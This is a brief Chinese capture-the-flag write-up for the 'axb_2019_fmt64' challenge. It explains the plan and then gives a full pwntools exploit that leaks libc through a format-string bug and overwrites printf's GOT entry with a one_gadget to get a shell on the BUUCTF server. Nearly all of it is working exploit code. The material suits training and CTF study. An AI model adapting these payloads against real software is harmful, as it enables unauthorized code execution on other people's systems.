axb_2019_fmt64

典型的fmt，checksec检查后，只有NX保护，所以直接hook got表就完事了，不过这里我就郁闷了  不准我通过printf函数，leak libc？？？？

思路

1. 先用fmt leak libc，再用one_gadget hook掉got表中的函数，我这里hook的是printf函数

exp

from pwn import *
#offset 8 arg
#p=process('./axb_2019_fmt64')
p=remote('node3.buuoj.cn',28024)
elf=ELF('./axb_2019_fmt64')
#p=gdb.debug('./axb_2019_fmt64','b printf')
libc=ELF('../libc-2.23.so')

one_gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]

#leak libc
p.recvuntil("Please tell me:")
p.sendline(b'%9$spppp'+p64(elf.got['sprintf']))

sprintf=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))

libc.address=sprintf-libc.symbols['sprintf']
one_gadget=libc.address+one_gadgets[0]

#hook got's sprintf
p1=one_gadget&0xffff
p2=(one_gadget>>16)&0xffff

payload=b'%'+bytes(str(p1-9),encoding='utf-8')+b'c%12$hn'
payload+=b'%'+bytes(str(p2-p1),encoding='utf-8')+b'c%13$hn'
payload=payload.ljust(0x20,b'\x00')
payload+=p64(elf.got['printf'])+p64(elf.got['printf']+2)

p.sendline(payload)
#gdb.attach(p)
p.interactive()
print(hex(one_gadget))
print(payload)